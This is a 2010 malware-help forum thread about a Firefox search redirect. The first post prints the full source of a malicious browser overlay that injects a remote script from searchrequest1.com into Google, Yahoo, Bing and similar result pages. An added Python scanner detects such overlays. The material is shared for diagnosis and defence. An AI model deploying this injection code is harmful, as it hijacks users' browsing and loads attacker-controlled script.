Google redirect issue - waitforclick.com/searchrequest1.com - possible solution

Discussion in 'Malware Help (A Specialist Will Reply)' started by Fidsah, Feb 12, 2010.

  1. Fidsah

    Fidsah Private E-2

    Lately, I ran into an issue where search results on Google were redirected to other sites, including waitforclick.com. I could find nothing infecting my system using HijackThis, Malwarebytes, or any other number of tools.

    After tearing my system apart in fury, I discovered the following regarding the issue.

    In the C:\Program Files (x86)\Mozilla Firefox\extensions\{9CE11043-9A15-4207-A565-0C94C42D590D}\chrome\content directory, I found a file called timer.xul which was responsible for the redirect.

    Here are the contents of the file:
    Code:
    <?xml version="1.0" encoding="UTF-8"?>
    <overlay id="xulcache-overlay"
      xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
    
    <script type="application/x-javascript" >
    function Insert() { var headID = content.document.getElementsByTagName("head")[0]; var newScript = content.document.createElement("script");
    newScript.type = "text/javascript"; newScript.src = "http://searchrequest1.com/request.php?aid=5nip3r"; headID.appendChild(newScript);}
    function URL() {var url=content.document.location.href; if(url.indexOf("googlesearchserver") == -1 ) { if(url.indexOf("search") != -1 ) {
    if(url.indexOf("google.com") != -1) { Insert(); } if(url.indexOf("yahoo.com") != -1)  { Insert(); } if(url.indexOf("bing.com") != -1)
    {Insert();} if(url.indexOf("ask.com") != -1) { Insert(); } if(url.indexOf("aol.com/aol/search?s_it") != -1){Insert();}}}}
    window.addEventListener("load", init, false); function init() { var appcontent = document.getElementById("appcontent");
    if(appcontent) { appcontent.addEventListener("DOMContentLoaded", onPageLoad, true); }} function onPageLoad(aEvent) { URL();}
    
    </script>
    </overlay>
    Apparently, it's loading JavaScript into the search results of popular search engines, which redirects the results to the search sites.

    This bit of pain seems to have been installed by another piece of malware, which I had removed weeks ago. However, this component was invisible on all scans.

    Starting Firefox in safe mode prevented the Google results from being redirected; however, in the Firefox GUI, I did not see an extension that was linked to this file, so I am still uncertain as to how it was loading.

    Unfortunately, I sorta tore my installation of Firefox apart locating what was causing this redirect, and cannot confirm (but highly suspect) that simply deleting this file would resolve this issue. After reinstalling Firefox, I no longer experience this redirect.

    Hope this information helps.
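
A way to look for this kind of overlay on disk, as an added example that is not part of the original post or any MajorGeeks tool: it walks an extensions directory and flags `.xul`/`.js` files that create a `<script>` element in the content page and point it at a remote URL, the pattern visible in the timer.xul above. The function names, the regex heuristics and the `injected.example` sample are assumptions made for illustration.

```python
import os
import re
import tempfile

# Heuristics modelled on the timer.xul shown in the post: chrome code that
# reaches into the page (content.document), creates a <script> element, and
# assigns a remote URL to its src. These patterns are assumptions, not a
# signature from any scanner.
CONTENT_SCRIPT = re.compile(r"content\.document\.createElement\(\s*[\"']script[\"']\s*\)")
REMOTE_SRC = re.compile(r"\.src\s*=\s*[\"'](https?://[^\"']+)[\"']")
SCAN_EXTS = (".xul", ".js")

def scan_text(text):
    """Return remote script URLs injected into content pages, or []."""
    if not CONTENT_SCRIPT.search(text):
        return []
    return REMOTE_SRC.findall(text)

def scan_tree(root):
    """Walk an extensions directory; return {path: [urls]} for flagged files."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                urls = scan_text(fh.read())
            if urls:
                hits[path] = urls
    return hits

def demo():
    """Build a constructed extensions tree in a temp dir and scan it."""
    bad = ('function Insert() { var s = content.document.createElement("script");'
           ' s.src = "http://injected.example/request.php"; }')
    ok = 'function hello() { var b = document.getElementById("appcontent"); }'
    with tempfile.TemporaryDirectory() as root:
        d = os.path.join(root, "{00000000-0000-0000-0000-000000000000}", "chrome", "content")
        os.makedirs(d)
        for name, body in (("timer.xul", bad), ("benign.js", ok)):
            with open(os.path.join(d, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return {os.path.basename(p): u for p, u in scan_tree(root).items()}

if __name__ == "__main__":
    print(demo())
```

Files packed inside `.jar` or `.xpi` archives are not opened by this scan, so a clean result only covers unpacked extension content.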
     
  2. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Welcome to Major Geeks!

    Yes, this is a common infection which we see and fix all the time. Our scans normally find this and allow us to remove it. Also, the below tool is commonly used to fix some forms of this infection:

    Using GooRedFix
     
